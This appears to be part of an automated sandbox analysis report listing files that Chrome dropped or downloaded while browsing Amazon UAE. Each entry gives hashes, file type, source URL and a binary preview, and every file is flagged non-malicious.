                                                                                                                                                                                                                                                                SHA-256:8E442B455E6EFB426B4D636B525C3E3368792F4D610B270C3D3967A6C009E0AB
                                                                                                                                                                                                                                                                SHA-512:3EBD82451B82ED87C29E28B9C9ACA98F3C60D1F0CAF8060AD6444E634D1035C12FE4C7A65A2067063C7595DA92212EF4FE8CEF20446391EC94E83A7BF001585C
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                URL:https://images-eu.ssl-images-amazon.com/images/G/39/AE-hq/2023/img/Events/XCM_Manual_1537854_5334346_372x232_2X._SY116_CB613596448_.jpg
                                                                                                                                                                                                                                                                Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*......t....".............................................................!.1A.."Qa.2q.......#BR......$%br..CST.................................................!1.....Qa."ABqr....R...#............?.....h6.<..R..^Z..+.^....q..-.D.Ltf.+4.Y!.V@.....v..1.z..*c.[...cP.3.K......et.#e.j.....t....f'...{m.,.z...F..O.W.v/.G........R.........arH.w..+.M..^.....+..z.y.U..J....)J.5..R.....4..R..)JR.".2....k4...c..'..z.....E..o.WB..|......Q.1..W...n:.R...~..x.<.#.q...2.......VU,.+.u....M..j..I..$.X...N7$.U&..u..O..Hb.\.N..:|.}+.o....1../....:p.9...?....g.s..V.c...3..:...........g....&9.1L.1...k.~..7R.|.3..*ip..Ec......9.k.U.5n/b.3d-.g......d......)";.oA"....-.9ow.^.=I.k..%..WB.7.8..~.5._f.<...>...T...!;.c..k"......./.....\...4..]..|.|....>.....rG...s.g.)..p..H..`.o.>.w...J0.<......j......z..'.....L...db.+...t.)J@..(.EJR
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 221x200, components 3
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):11394
                                                                                                                                                                                                                                                                Entropy (8bit):7.959192950955137
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:192:7iabG0tfxY8C4IlSHT+E5pgXB7MmTxwzWqxYQT5pzk4fOgoJwjXvu5lrkJomCrH:7nht6lblSz+ET61MnznxYK5pzoHGXvur
                                                                                                                                                                                                                                                                MD5:FB428A35179E2E87E610B0CD2B64EF77
                                                                                                                                                                                                                                                                SHA1:9E382E41B94B1618507A137FFBF20F345C2CD8FA
                                                                                                                                                                                                                                                                SHA-256:BB8B3EE8283E7EE0C43F76B8FE2BF6380F768162D2059D760846C6B64E48370E
                                                                                                                                                                                                                                                                SHA-512:8233000E2F062385AD61219328F787420DD3EF7A3A4D6F44A3E7844CC3F78D067F29C30AB8C9529E49FDC5121BC269F8F00C14C321AB57A49AB5004BEC5AF009
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*..........."...............................................................!.1.AQ."...2CSaqt...#5B...3..$r....4Rbs....................................................!1.A."Qaq2..#...B.....R.............?...)k...K*.w..,......,.I$.O.7....)..?.h.......J".....f..>o..5.Wh..|.o.k....._.v.".....f..>o..5.Wh..|.o.k....._.v.u4.......F.*.+......"Y.}.......~......y..TX.0[.c..8..Y..d..e.w6A..{]W..9I..r.*....XY..Ns.=....wo..)....h..LZ.h...%..;..7w#...8Q.-3h2^...`..|.%...g.$~.F.=..+,...%.......6.y~..2.e&..[_.0....a!..>..\x.q;=.[.0.X.+..{+..x.o..e.p..FC...G ......f...4.#S}._r...9^..c.4e...0..K.B:#)rd..v...`ci...;`..`>Z..H.K....5.b].KR,HS_....~.|.o.k.;..K9(\...7....w...[$.%..*.c...l>s...K...(...R.Sx.s2..|Ot*4({....XR.....~.|.o.k..D\......G....f....E....~.|.o.k..D\......G....f....D.:.........).k......F.C.wLw..Gm......Hu.
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 186x116, components 3
                                                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                                                Size (bytes):5203
                                                                                                                                                                                                                                                                Entropy (8bit):7.836188463655531
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:96:xyp717Sw2bfkfioZ8v6pYC/gvnDKRWsGilV36SaQej62arQiGibKp5Lo:xyff2CeC/gvnDKRrnZMarQsbK7M
                                                                                                                                                                                                                                                                MD5:E17A9C392B377C4FD7B7F1DEEB758782
                                                                                                                                                                                                                                                                SHA1:DF4DD289DDA661B7124F97416101DC916EE16356
                                                                                                                                                                                                                                                                SHA-256:9FAC05FCF7ED3F20826F4514200E2B15082560D018D596C80A49A7CD19A4EC7F
                                                                                                                                                                                                                                                                SHA-512:6EEF9C7F661A9EAE1583CC95F7231722E215A2EE35A981972E0E53E29D226C5221EE1FE2DCFD82EFFC4BF92F6516C3CB200A46007E23908B4AF7D0DD136D7BF5
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                URL:https://images-eu.ssl-images-amazon.com/images/G/39/UAE-hq/2023/img/Consumer_Electronics/XCM_CUTTLE_1615422_3332325_186x116_1X_en_AE._SY116_CB597933578_.jpg
                                                                                                                                                                                                                                                                Preview:......JFIF......................................................................................................................................................t...."..........9.........................................................................n.......==@.....<19....+i......7....nl..#~^...n;....kp..z........tt|.e*p....Y..v.........;.G_..y.|...D.......9q.%.H..Mo.-.o......e...,..06.P..o...m...^D.......c.4..E...>...b|y..y...9.UOm.x.FJ.....[.\m9\mV....b...*....>..f..._I..+.E...aZ..{.9=N.....if......l.a+=>.!..._.....".\..a.&../J.z:.<...................Z.............................1..!%5AU..$&04EQaq..F....6Wef...."'DGPRTv.....27@dtu...............?....u.\.e........q......e..I...../.K@.1..6m...X.S...$.. .)........\..m.?.g..rOj.T...wmFUY....'..OiS...Wr.t-....wrT._....]....i.W..w.6K.@Q..L.:c[h.)s..Z..Z9....4..lQp_bL...,@.wUC.H8......r.. .M%..?..,._.:(.d..3...Fq......K ....C.54&..!.....=@....T../L/".I3K.k..!C.k*.M.....{_.....]..Hr.g[..... 5.eh.]..f.....y
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:HTML document, ASCII text
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):71
                                                                                                                                                                                                                                                                Entropy (8bit):4.19644707821733
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:3:PouVIZxgRO5ZB1XbZ6iFi:haxUkZ3X96x
                                                                                                                                                                                                                                                                MD5:6AAEF67381946BFC1DDACCA8CF7F6C36
                                                                                                                                                                                                                                                                SHA1:E441BBA8B691AD0FFF0BCCB75974880018AB41D6
                                                                                                                                                                                                                                                                SHA-256:73F8AE8C11DAA6AD905107970E55C3C64CD7133561E9E91E650AAB092BA7245E
                                                                                                                                                                                                                                                                SHA-512:99039B90D4F3819EFB0A395D0DC810DEE1A56265D443D24D1C9BDF832EF9F95887E3C417253698A4F76EF176D0ACE6334905F4B7B4E6A8421D2F650B84255EC2
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:<!DOCTYPE html><html><head><title>x</title></head><body></body></html>.
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 480x440, components 3
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):13638
                                                                                                                                                                                                                                                                Entropy (8bit):7.892050748414596
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:192:Gs/gK8khyeMEg+SThqUe+xTqExzq/I7KhG0GNyrsNAgbjKWD8AeQ2Ka70n9LA5F5:RM/1U+5pzq/zxN+tS3Q298ub
                                                                                                                                                                                                                                                                MD5:BCDEF36259383D92C18F1E279E574672
                                                                                                                                                                                                                                                                SHA1:C1FBDD73BA0B7A36A5487D371EE445C12AB34974
                                                                                                                                                                                                                                                                SHA-256:5151B05089677C3ABD63A1085734599B7DF43AF87061C8E1A49C56FEFEACDACF
                                                                                                                                                                                                                                                                SHA-512:112F9C4645860FB3B265801782AE7EE0A1ACDFBE74A3306FC4FA29260CC9C851DA3AD4837C11ACD853B0ED936747B4C461498B7A459C3CA3D5A0A1C1121E9F4B
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*..........."..........5..................................................................,..................................................(UAU.T.PT.5.ej...............x..J.............>9..{T..S..sh.Q.....}`>O}`>O}`>N}bc.......}a.8.E.g...J}S.:..O.....>.........tyD~...^y.^.^..jW..@...........q..?8$....(R.g.|..u..N.4[.;.k.ku.kD....u......<T.......?... .........|..x.n...W...oz.,6..r+.>..~h...5.q....}vL.d....I...u.{...K...q.3..b$e.................>m..?.O..+..&....&....7.d.r.....;<.^k..X3r3%......q.vL./....3.}~i......Rw{T.j...jY..{.+..............}..)..j,{V.,.in.|..|....!].....].6..M.~n..m._...9..<...jD^/S..a.....'...O8..K...O....{O0...........=..vJ....y...L../.O^'.0..N\.....7f...p..$..S7/.%.}z..1..<..Y....O..v...%.U..z...t.s...`=.................\.>..S/1._..3.3..c?#i...J.tx..x[.y%.+....q..I.......2`....e
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 480x440, components 3
                                                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                                                Size (bytes):18684
                                                                                                                                                                                                                                                                Entropy (8bit):7.93763591250368
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:384:5NYCXlDXmecaVP3cPEEzuRznWTFjct381EidX8SSyKIBxa/ZJ2n+n:DXxXmecaVPcjuRznWZj6IndQYxCZcM
                                                                                                                                                                                                                                                                MD5:B20499771C5AFEF374F38BDAAFBFF8E7
                                                                                                                                                                                                                                                                SHA1:FCB7F93E5706F900BB35BAF933C3104FCDBA4F18
                                                                                                                                                                                                                                                                SHA-256:AF303EC24F5EB5325A966B1E0D7C9100E40A5F2671CBBD85B8501C8E97165105
                                                                                                                                                                                                                                                                SHA-512:7A9F4255D327194CD890503FD1F5901008EBAE5F8A7B1043CA2C258E1373B61C43DF8E48B27413E26A6F947F8EFC25C4520761C2099ED58EC6D038B33FA8F88C
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                URL:"https://m.media-amazon.com/images/I/41gRz4miKkL._SR480,440_.jpg"
                                                                                                                                                                                                                                                                Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*..........."..........5..................................................................X..........$.'^.....zB.X..hO.....!..h.E....=.y..{d._\...N......q......................C...k.0=-.\M.#.%.....bH...?.I^..,...zE.._....G'7+r..y..4.<..<..1C.K..H=/..4=U..........................<.....P.E.AS...R....wz..N..'D.._.Y:W.K5.>.S.W%...@.9..XrjI#.).*.|Q.\.D...IY,b....u&1.k.zw..=.............x...(a.....WG...2.i.?8.....'....u.l.sP....M.,.j7s...q.Q5F......I....3............w.............y..~..l..*Gc...../...%h...)9@e..E.'w..,..rc.ji..4MT.\..,.M...F....U0.}..}fX...w.............ys.......lp.......=G.B.I.#$...E......v...g&.o...jj....}NQ..@..9n7A...d;..n.-................u...<./.eNU.L. ...)..Et.(8@c.....o..,'M..3.=w..J.3..y$Jw...n.q$Vn&.7..5VDG}7/................*........|..}(`|.........T.B%5....r.b.x....ze...m.i.A%...:..'8.M.
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                                                Size (bytes):43
                                                                                                                                                                                                                                                                Entropy (8bit):2.9889835948335506
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:3:CUXPQD/lHpse:1Qvse
                                                                                                                                                                                                                                                                MD5:E68CC604CAB69BF03B8CD228D940F5EF
                                                                                                                                                                                                                                                                SHA1:15C0C62C4C7C917B5DD82A8E1E439211A44B9E98
                                                                                                                                                                                                                                                                SHA-256:A3A64AEA2E96EC58A163DDB8D4CF86CF236178ED2D225B8F44154BC1B010DDCE
                                                                                                                                                                                                                                                                SHA-512:E250128E5EBE1384113C834409BEFB9CD0728B68EF07AB3450CB0A11F64A8AE9B29C48695DB73D0E4BBA0FD976BDCC24BEEA0F326FAD1B4CA072BCCE6E24E3A5
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                URL:https://fls-eu.amazon.ae/1/batch/1/OP/A2VIGQ35RCS4UG:262-5692979-3003613:99EW8DTCPK04PDBCDQEK$uedata=s:%2Frd%2Fuedata%3Fat%26v%3D0.294992.0%26id%3D99EW8DTCPK04PDBCDQEK%26ic%3D2%26m%3D1%26sc%3Dcsa%3Aatfsi%26atfsi%3D915%26pc%3D5710%26at%3D5710%26t%3D1723469093787%26pty%3DFreshMerchandisedContent%26spty%3Dlearn-more%26pti%3Dlearn-more%26tid%3D99EW8DTCPK04PDBCDQEK%26aftb%3D1%26lob%3D1:5709
                                                                                                                                                                                                                                                                Preview:GIF89a.............!.......,...........L..;
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):29858
                                                                                                                                                                                                                                                                Entropy (8bit):5.402167872370779
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:192:Vd3+dHJ67FPpE3eFNxQoRvL4aX+wgvDv5IPg4empqsRU+/jfrY6bV6akWvBiq/Yd:VJOpGPpEuKoZLbP2grqaP3bYvKFzC
                                                                                                                                                                                                                                                                MD5:B9CAD0E5B0AF717020ACD849F21382FD
                                                                                                                                                                                                                                                                SHA1:CB1EA25164D731DBE897A6C41F9B3DD090B12E74
                                                                                                                                                                                                                                                                SHA-256:4491CFA9A2882E7F863F1B4C1AC13319D6651B9F0B29147912D3FEFC133FF670
                                                                                                                                                                                                                                                                SHA-512:36745DACF73AD97313695AC37A6E053065F68741BCA37E66727095920B5525D6670C26BA3DE5581E380D2831C985E62ECCFB884155590CA727CF1A75FEFF3EE8
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:{"html":"\u003cdiv class\u003d\"rhf-border\"\u003e\u003cdiv id\u003d\"rhf-shoveler\"\u003e\u003c/div\u003e\u003cdiv class\u003d\"celwidget pd_rd_w-RsHzS content-id-amzn1.sym.cb2e421d-130c-4154-89f5-508ab5cbe603 pf_rd_p-cb2e421d-130c-4154-89f5-508ab5cbe603 pf_rd_r-44DJV1345PAVN833A2ZY pd_rd_wg-nbija pd_rd_r-b95e05a9-8beb-4ddc-b7f8-d859bc8ea259 c-f\" cel_widget_id\u003d\"p13n-rvi_desktop-rvi_0\" data-csa-op-log-render\u003d\"\" data-csa-c-content-id\u003d\"amzn1.sym.cb2e421d-130c-4154-89f5-508ab5cbe603\" data-csa-c-slot-id\u003d\"desktop-rvi-1\" data-csa-c-type\u003d\"widget\" data-csa-c-painter\u003d\"p13n-rvi-cards\"\u003e\u003cscript\u003eif(window.mix_csa){window.mix_csa(\u0027[cel_widget_id\u003d\"p13n-rvi_desktop-rvi_0\"]\u0027, \u0027#CardInstanceQPeARlercOodGjztCDvfVA\u0027)(\u0027mark\u0027, \u0027bb\u0027)}\u003c/script\u003e\n\u003cscript\u003eif(window.uet){window.uet(\u0027bb\u0027,\u0027p13n-rvi_desktop-rvi_0\u0027,{wb: 1})}\u003c/script\u003e\n\u003cstyle\u003e.p13n-sc-rvi
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 1x1, components 3
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):285
                                                                                                                                                                                                                                                                Entropy (8bit):3.992477276923708
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:6:7hHx7qC0o26Z+aW6Hri/aliltjDtqRXhP/lYYms9:7vTtRWPtsh/lz
                                                                                                                                                                                                                                                                MD5:B1DF542B3846358E48A00920727A87EB
                                                                                                                                                                                                                                                                SHA1:B3E8EE8554DA24238553747F8B2656739AD00FFD
                                                                                                                                                                                                                                                                SHA-256:733E9DF98B6072B548E0D75DDAE41F62B4EB20996D3C06588B78D9963F57DB94
                                                                                                                                                                                                                                                                SHA-512:3281B4C63BBADB693CC73281197675FCC8FBCB0671DE59C6F525C054C19EF274EC6738E872559FB077758406C7982E478C3B9F6D3C30A73DAF0E1716220C94F2
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:......JFIF.............C..............................................!........."$".$.......C............................................................................"............................................................................................................?...$..
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):58
                                                                                                                                                                                                                                                                Entropy (8bit):4.364819634194334
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:3:j4OiLEF1vjdKDMJldsM9fkLHn:j4DErdKDMbdsN
                                                                                                                                                                                                                                                                MD5:B1935F865A4EADE8564B6EF4B022F27F
                                                                                                                                                                                                                                                                SHA1:F42746792E52473C4D9E152ACEB7080550D3C1E5
                                                                                                                                                                                                                                                                SHA-256:21C52B1622A4539BF82DBC7FD4A2638CDDE3B8151697EB5C4D3DBB426576FBAA
                                                                                                                                                                                                                                                                SHA-512:9693E0CAD83BF557BDADDE705241F580ED85DB0375AC381A21FC10E020FF96386E68514356C3B15FDCAF7BDCB8D74804D794E63D5BC9F58245DBB18B6C9A8062
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:Standard Amazon AWS CloudFront Profile Experiment Response
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):43
                                                                                                                                                                                                                                                                Entropy (8bit):2.9889835948335506
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:3:CUXPQD/lHpse:1Qvse
                                                                                                                                                                                                                                                                MD5:E68CC604CAB69BF03B8CD228D940F5EF
                                                                                                                                                                                                                                                                SHA1:15C0C62C4C7C917B5DD82A8E1E439211A44B9E98
                                                                                                                                                                                                                                                                SHA-256:A3A64AEA2E96EC58A163DDB8D4CF86CF236178ED2D225B8F44154BC1B010DDCE
                                                                                                                                                                                                                                                                SHA-512:E250128E5EBE1384113C834409BEFB9CD0728B68EF07AB3450CB0A11F64A8AE9B29C48695DB73D0E4BBA0FD976BDCC24BEEA0F326FAD1B4CA072BCCE6E24E3A5
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:GIF89a.............!.......,...........L..;
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):43
                                                                                                                                                                                                                                                                Entropy (8bit):2.9889835948335506
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:3:CUXPQD/lHpse:1Qvse
                                                                                                                                                                                                                                                                MD5:E68CC604CAB69BF03B8CD228D940F5EF
                                                                                                                                                                                                                                                                SHA1:15C0C62C4C7C917B5DD82A8E1E439211A44B9E98
                                                                                                                                                                                                                                                                SHA-256:A3A64AEA2E96EC58A163DDB8D4CF86CF236178ED2D225B8F44154BC1B010DDCE
                                                                                                                                                                                                                                                                SHA-512:E250128E5EBE1384113C834409BEFB9CD0728B68EF07AB3450CB0A11F64A8AE9B29C48695DB73D0E4BBA0FD976BDCC24BEEA0F326FAD1B4CA072BCCE6E24E3A5
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:GIF89a.............!.......,...........L..;
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 400x400, components 3
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):56755
                                                                                                                                                                                                                                                                Entropy (8bit):7.973406642815217
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:1536:VtMKW43ZIHxIlLasEzXjw4jGeDZbToj4Aig1Ct5Er:NWqORyLdEzz9Qj4Aig0bEr
                                                                                                                                                                                                                                                                MD5:BE236EBEF7B0090BFFCF31A5181B1BAF
                                                                                                                                                                                                                                                                SHA1:0F52B2342A6236339EFAA5A98DCD061884CF9C91
                                                                                                                                                                                                                                                                SHA-256:338A305336D450EEEB81068B22C7A34FF69B43732EB2EDF0EDD6549F12A21416
                                                                                                                                                                                                                                                                SHA-512:FAC9572E8F750BFE0F3985CBF0290E1D5F16505ECEB1F977A1313B9B9D217A8DB7CFA21EB3FC0AABE5D3BF2F76C947B5CD8FA8384AD4A62247467B1A97249970
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:......JFIF......................................................................................................................................................................;...................................................................................[a.....]...p.6.[..}G.z.+......k..i\..cV...............>`..`....{/X.s.4..p....*...[...&....q..p..........:4.....+i.y.q........+l.lJ....cnp.z.*..........~..N...B6B..k........*..2w.[..a..............h.....'"................6...........?.&[.......>...........+R.... 6o.......D=..ho.[....................Jf,m...=.W.:#.5.#..|.....y5...........h..{..........0.............vK.v[.~S.C..,.s_.@5....."...D9.............c..K........0....w.......Z.07.]........'2...............?.~.]\.eXj......f..X.......ML.;M.@..(.ivc#.{..............@...xx......>3...V..|.Z3..Q.F...B.'.~.i.}..0........a./...........;|5....f.^.f.}..u.(..i....G...&"..e....S.+.....;.&=s.n_o0.._L..".~...........x..u.P..-f..=ssV...{.R..!r}...?.P.}..E.l~L.
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 400x400, components 3
                                                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                                                Size (bytes):12914
                                                                                                                                                                                                                                                                Entropy (8bit):7.899040090858498
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:192:YRg5hcCLUBXeeIRmaPJpuV17ReLBoz1VWvTxhUvc8QXuWRJ3fjoQDQZuf0Ik:YUhNoBYPPGdRTZWTxlNhvfjoQDQyk
                                                                                                                                                                                                                                                                MD5:682A2C97EDA77C422EDD117FC4AEC43B
                                                                                                                                                                                                                                                                SHA1:0A1448C6FB56C68FDE2BAAACC9795499EE4D2FBA
                                                                                                                                                                                                                                                                SHA-256:DEE025E33DFC4BB9DFD84B450EF88BFA2DD25496768AD765CFEA00DC9FDF210B
                                                                                                                                                                                                                                                                SHA-512:1BD3DE86DDBD95F8772991EF23542B6BDBAD159EED439DBE52DB92F4C76508C8AA2BB59B9CC1E89D8966A5BCD6849DC91DE8436AE8BF97003AD87601A5C08778
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                URL:https://images-eu.ssl-images-amazon.com/images/G/39/AE-hq/2022/img/Sports/XCM_Manual_1521089_5259751_400x400_2X._CB617696541_.jpg
                                                                                                                                                                                                                                                                Preview:......JFIF..........................................................................................................................................................."..........3.............................................................................x.;.3.nT.=...<.!..............[]..j|.\..).<......=...k...W.,.............9w.:........u...v}._a..J.........:......$............vo.~.o; ......c....&..=....K)..zP......d..lyR..YW......l'.&M~.w7.YH......B0u......~any..[......#o..]?C.....i.[...Qvso.b.N.O=..L*...M..;B...,%.....2.>.S.....;...dN..d..l...N.|..'`.vF.q.:#....X*.1. ....:...>..ru...p.0g...#.P......<.w7</.g.c..=..}.[....].b.r.t}.^.r[...\..V.........*...mQ...i...........v..n..i........V-v....Y.Ti...I^y...o...........o~k...<(.{.;..H........F_..F_.O..2|..}.c}......O[.O.]7........{.vw..y.. B.a.........8}....FO.vP.....>....l...7./..#..._9...............v..x..........`..:.z.3.-.e..\.......h..(k..vZ.5...}.n....Q.#.....ZZS.m.i.......... ..VtY.>...
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                                                Size (bytes):43
                                                                                                                                                                                                                                                                Entropy (8bit):2.9889835948335506
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:3:CUXPQD/lHpse:1Qvse
                                                                                                                                                                                                                                                                MD5:E68CC604CAB69BF03B8CD228D940F5EF
                                                                                                                                                                                                                                                                SHA1:15C0C62C4C7C917B5DD82A8E1E439211A44B9E98
                                                                                                                                                                                                                                                                SHA-256:A3A64AEA2E96EC58A163DDB8D4CF86CF236178ED2D225B8F44154BC1B010DDCE
                                                                                                                                                                                                                                                                SHA-512:E250128E5EBE1384113C834409BEFB9CD0728B68EF07AB3450CB0A11F64A8AE9B29C48695DB73D0E4BBA0FD976BDCC24BEEA0F326FAD1B4CA072BCCE6E24E3A5
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                URL:https://fls-eu.amazon.ae/1/batch/1/OP/A2VIGQ35RCS4UG:262-5692979-3003613:JZJKZTDKNV2CKC82BW2M$uedata=s:%2Frd%2Fuedata%3Fat%26v%3D0.294992.0%26id%3DJZJKZTDKNV2CKC82BW2M%26m%3D1%26sc%3Dcsa%3Avl50%26vl50%3D49%26pc%3D16649%26at%3D16649%26t%3D1723469060971%26pty%3DGateway%26spty%3Ddesktop%26pti%3Ddesktop%26tid%3DJZJKZTDKNV2CKC82BW2M%26aftb%3D1%26lob%3D1:16649
                                                                                                                                                                                                                                                                Preview:GIF89a.............!.......,...........L..;
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 225x160, components 3
                                                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                                                Size (bytes):6350
                                                                                                                                                                                                                                                                Entropy (8bit):7.91310645121908
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:96:TOqJijTYpYYRAbOe1m80hRc68oA1vABDSgwyBasxD/AfL+ZxpV1U:iqJ6TY6b3m8iv8oAqBDSgwQlRAfL+ZF+
                                                                                                                                                                                                                                                                MD5:104A0150C38A920DB3F7C581C1BA3747
                                                                                                                                                                                                                                                                SHA1:FBAF0AD8D2ABB01DCB87AC56B011B1FD3F8F35E1
                                                                                                                                                                                                                                                                SHA-256:3282DC88EF89D567462DA846179DE9316E3F8EADEAA4A1D30F7DA1AFB0A78A0B
                                                                                                                                                                                                                                                                SHA-512:AED8EE1D664EE7F132B6275F697AC1A95EEE3FE3A03958BD8FF3C7D052711408D807E93CA1D6C9153F112858A48836CDA70212DA528620E7E9E502394B4C1C6C
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                URL:"https://images-eu.ssl-images-amazon.com/images/I/81B7s-7r48L._AC_UL225_SR225,160_.jpg"
